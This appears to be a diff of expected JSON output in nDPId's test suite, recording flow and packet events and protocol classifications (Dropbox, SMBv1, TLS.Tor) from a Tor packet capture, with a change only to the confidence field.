00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":86,"source":"tor.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821673254,"flow_last_seen":1383821673254,"flow_idle_time":200000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1383821673254,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00632{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"tor.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1383821673254,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":186,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":186,"pkt_l4_len":152,"thread_ts_msec":1383821673254,"pkt":"\/\/\/\/\/\/\/\/UlQAwqwfCABFAACsAABAAEARtfDAqAEBwKgB\/0RcRFwAmDDeeyJob3N0X2ludCI6IDY3Njg3OTk3NiwgInZlcnNpb24iOiBbMSwgOF0sICJkaXNwbGF5bmFtZSI6ICI2NzY4Nzk5NzYiLCAicG9ydCI6IDE3NTAwLCAibmFtZXNwYWNlcyI6IFsxNjc4NDEyMTYsIDE4MTA4Mzk2OCwgMTgxMDgwMzI0LCAyOTU0NDE3M119"} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"tor.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821673254,"flow_last_seen":1383821673254,"flow_idle_time":200000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1383821673254,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 
+00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"tor.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821673254,"flow_last_seen":1383821673254,"flow_idle_time":200000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1383821673254,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00178{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":87,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821674212} 00344{"packet_event_id":1,"packet_event_name":"packet","packet_id":87,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821673254,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00178{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":88,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821676212} 
@@ -57,7 +57,7 @@ 00344{"packet_event_id":1,"packet_event_name":"packet","packet_id":96,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821673254,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":97,"source":"tor.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821693159,"flow_last_seen":1383821693159,"flow_idle_time":200000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":210,"midstream":0,"thread_ts_msec":1383821693159,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00720{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"tor.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1383821693159,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":252,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":252,"pkt_l4_len":218,"thread_ts_msec":1383821693159,"pkt":"\/\/\/\/\/\/\/\/UlQAWul3CABFAADuA4EAAIARsTLAqAH8wKgB\/wCKAIoA2itVEQLJT8CoAfwAigDEAAAgRUZFT0VFRUpFQkVPQ05GQUVEQ0FDQUNBQ0FDQUNBQUEAIEFCQUNGUEZQRU5GREVDRkNFUEZIRkRFRkZQRlBBQ0FCAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAKgAAAAAAAAAAAOgDAAAAAAAAAAAqAFYAAwABAAEAAgA7AFxNQUlMU0xPVFxCUk9XU0UADACguw0AV09SS0dST1VQAAAAAAAAAAMKABAAgP4HAABFTkRJQU4tUEMA"} 
-00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":97,"source":"tor.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821693159,"flow_last_seen":1383821693159,"flow_idle_time":200000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":210,"midstream":0,"thread_ts_msec":1383821693159,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":97,"source":"tor.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821693159,"flow_last_seen":1383821693159,"flow_idle_time":200000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":210,"midstream":0,"thread_ts_msec":1383821693159,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 00178{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":98,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821694212} 
00344{"packet_event_id":1,"packet_event_name":"packet","packet_id":98,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821693159,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00178{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":99,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821696212} 
@@ -170,27 +170,27 @@ 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1843,"source":"tor.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1383822129951,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1383822129951,"pkt":"UlQA2EYhUlQAWul3CABFAAAoCJlAAIAGv0TAqAH81FOb+sfmAbsbVwNnrWI9fVAQAQCoogAAAAAAAAAA"} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1844,"source":"tor.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1383822129961,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383822129961,"pkt":"UlQAWul3UlQA2EYhCABFAAA0AABAAC4G0J5bj13ywKgB\/AG7x+fD3pw1Z7sOzYASOQgZlAAAAgQFtAEBBAIBAwMH"} 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1845,"source":"tor.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1383822129962,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1383822129962,"pkt":"UlQA2EYhUlQAWul3CABFAAAoCJpAAIAGdhDAqAH8W49d8sfnAbtnuw7Nw96cNlAQAQCSbgAAAAAAAAAA"} -00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1846,"source":"tor.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383822129889,"flow_last_seen":1383822129965,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1383822129965,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"212.83.155.250","src_port":51174,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": 
{"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.t3i3ru.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01183{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1847,"source":"tor.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383822129897,"flow_last_seen":1383822129972,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1383822129972,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51175,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.gfu7hbxpfp.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01146{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1849,"source":"tor.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383822129889,"flow_last_seen":1383822130023,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":743,"flow_tot_l4_payload_len":952,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1383822130023,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"212.83.155.250","src_port":51174,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.t3i3ru.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"184d532a16876b78846ae6a03f654890","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=www.wohgpas45j6ucw.com","subjectDN":"CN=www.7d43ah2kikrabj.net","fingerprint":"F9:1D:5F:89:8F:D8:58:1E:45:E7:9B:A6:FD:90:95:77:FF:DD:E8:1B"}} -01395{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1852,"source":"tor.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383822129897,"flow_last_seen":1383822130047,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":748,"flow_tot_l4_payload_len":961,"flow_avg_l4_payload_len":160,"midstream":0,"thread_ts_msec":1383822130047,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51175,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe 
Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.gfu7hbxpfp.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"184d532a16876b78846ae6a03f654890","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=www.xkgk7fdx362yyyxib.com","subjectDN":"CN=www.g6ghvisevf3ibuu5.net","fingerprint":"94:F9:FF:E2:7F:DB:1F:B8:19:65:20:6F:F6:DE:B6:A5:D5:AF:14:C7"}} +00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1846,"source":"tor.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383822129889,"flow_last_seen":1383822129965,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1383822129965,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"212.83.155.250","src_port":51174,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.t3i3ru.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01183{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1847,"source":"tor.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383822129897,"flow_last_seen":1383822129972,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1383822129972,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51175,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.gfu7hbxpfp.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01146{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1849,"source":"tor.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383822129889,"flow_last_seen":1383822130023,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":743,"flow_tot_l4_payload_len":952,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1383822130023,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"212.83.155.250","src_port":51174,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1","client_requested_server_name":"www.t3i3ru.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"184d532a16876b78846ae6a03f654890","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=www.wohgpas45j6ucw.com","subjectDN":"CN=www.7d43ah2kikrabj.net","fingerprint":"F9:1D:5F:89:8F:D8:58:1E:45:E7:9B:A6:FD:90:95:77:FF:DD:E8:1B"}} +01395{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1852,"source":"tor.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383822129897,"flow_last_seen":1383822130047,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":748,"flow_tot_l4_payload_len":961,"flow_avg_l4_payload_len":160,"midstream":0,"thread_ts_msec":1383822130047,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51175,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.gfu7hbxpfp.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"184d532a16876b78846ae6a03f654890","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=www.xkgk7fdx362yyyxib.com","subjectDN":"CN=www.g6ghvisevf3ibuu5.net","fingerprint":"94:F9:FF:E2:7F:DB:1F:B8:19:65:20:6F:F6:DE:B6:A5:D5:AF:14:C7"}} 00180{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":1862,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822130216} 
00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":1862,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822130168,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1888,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383822130889,"flow_last_seen":1383822130889,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1383822130889,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51176,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1888,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1383822130889,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383822130889,"pkt":"UlQA2EYhUlQAWul3CABFAAA0CK1AAIAGwljAqAH8JuVGNcfoAbv0twffAAAAAIACIABZFwAAAgQFtAEDAwgBAQQC"} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1891,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1383822131033,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383822131033,"pkt":"UlQAWul3UlQA2EYhCABFAAA0AABAADQGFwYm5UY1wKgB\/AG7x+hg0\/cE9LcH4IASOQjoIwAAAgQFtAEBBAIBAwMK"} 
00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1892,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1383822131034,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1383822131034,"pkt":"UlQA2EYhUlQAWul3CABFAAAoCK9AAIAGwmLAqAH8JuVGNcfoAbv0twfgYNP3BVAQAQBhAQAAAAAAAAAA"} -00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1893,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383822130889,"flow_last_seen":1383822131034,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1383822131034,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51176,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.jmts2id.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01144{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1896,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383822130889,"flow_last_seen":1383822131220,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":929,"flow_tot_l4_payload_len":1139,"flow_avg_l4_payload_len":189,"midstream":0,"thread_ts_msec":1383822131220,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51176,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": 
{"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.jmts2id.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"e1691a31bfe345d2692da75636ddfb00","unsafe_cipher":0,"cipher":"TLS_DHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"CN=www.gg562izcxdvqdk.com","subjectDN":"CN=www.fcsyvnlemwxv5p.net","fingerprint":"C1:93:18:2C:A3:1D:AC:5F:C7:DE:17:8A:4E:B1:E8:13:BB:08:73:3A"}} +00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1893,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383822130889,"flow_last_seen":1383822131034,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1383822131034,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51176,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.jmts2id.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01144{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1896,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383822130889,"flow_last_seen":1383822131220,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":929,"flow_tot_l4_payload_len":1139,"flow_avg_l4_payload_len":189,"midstream":0,"thread_ts_msec":1383822131220,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51176,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.jmts2id.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"e1691a31bfe345d2692da75636ddfb00","unsafe_cipher":0,"cipher":"TLS_DHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"CN=www.gg562izcxdvqdk.com","subjectDN":"CN=www.fcsyvnlemwxv5p.net","fingerprint":"C1:93:18:2C:A3:1D:AC:5F:C7:DE:17:8A:4E:B1:E8:13:BB:08:73:3A"}} 00180{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":1919,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822132212} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":1919,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822132203,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 
-00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1936,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":141,"flow_first_seen":1383821665420,"flow_last_seen":1383821774457,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":60720,"flow_avg_l4_payload_len":430,"midstream":0,"thread_ts_msec":1383822133787,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51110,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 